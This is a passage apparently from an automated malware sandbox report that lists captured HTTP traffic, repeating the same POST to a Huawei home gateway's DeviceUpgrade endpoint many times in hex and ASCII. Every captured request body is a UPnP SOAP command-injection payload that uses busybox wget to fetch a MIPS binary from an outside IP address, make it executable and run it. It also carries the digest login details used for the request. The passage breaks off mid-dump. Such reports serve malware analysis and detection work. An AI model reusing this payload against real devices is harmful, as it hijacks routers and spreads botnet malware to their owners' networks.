6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 